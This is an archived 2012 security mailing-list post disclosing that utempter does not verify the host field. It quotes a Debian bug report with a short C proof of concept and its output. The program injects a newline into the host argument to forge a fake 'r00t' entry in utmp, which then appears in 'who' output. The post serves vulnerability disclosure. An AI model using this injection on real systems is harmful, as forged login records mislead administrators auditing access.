lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201210061053.q96Ar2YW020173@bari.maths.usyd.edu.au>
Date: Sat, 6 Oct 2012 20:53:02 +1000
From: paul.szabo@...ney.edu.au
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: utempter allows fake host setting

Quoting from 
http://bugs.debian.org/689562

  Utempter does not (cannot?) verify the setting of host, so it can easily
  be faked. This may affect any software that depend on utmp correctness.
  
  Demo of the issue:
  
  psz@...i:~$ cat silly.c
  #include <sys/types.h>
  #include <sys/stat.h>
  #include <fcntl.h>
  #include <unistd.h>
  #include <stdio.h>
  int main()
  {
    int i;
    i = open("/dev/ptmx", O_RDWR);
    printf("open ptmx returned %d\n", i);
    dup2(i, 0);
    /* dup2(i, 1); */
    printf("doing utempter add\n");
    system("/usr/lib/utempter/utempter add 'xyz)\nr00t     pts/0        Jan  1 01:02 (xyz.com'");
    printf("checking who\n");
    system("who | grep xyz");
    printf("doing utempter del\n");
    system("/usr/lib/utempter/utempter del");
    printf("checking who\n");
    system("who | grep xyz");
    printf("DONE\n");
  }
  psz@...i:~$ cc silly.c; a.out
  open ptmx returned 3
  doing utempter add
  checking who
  psz      pts/29       Oct  4 11:48 (xyz)
  r00t     pts/0        Jan  1 01:02 (xyz.com)
  doing utempter del
  checking who
  DONE
  psz@...i:~$ 
  
  Please see also:
  http://bugs.debian.org/329156
  http://bugs.debian.org/330907

Cheers, Paul

Paul Szabo   psz@...hs.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics   University of Sydney    Australia

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ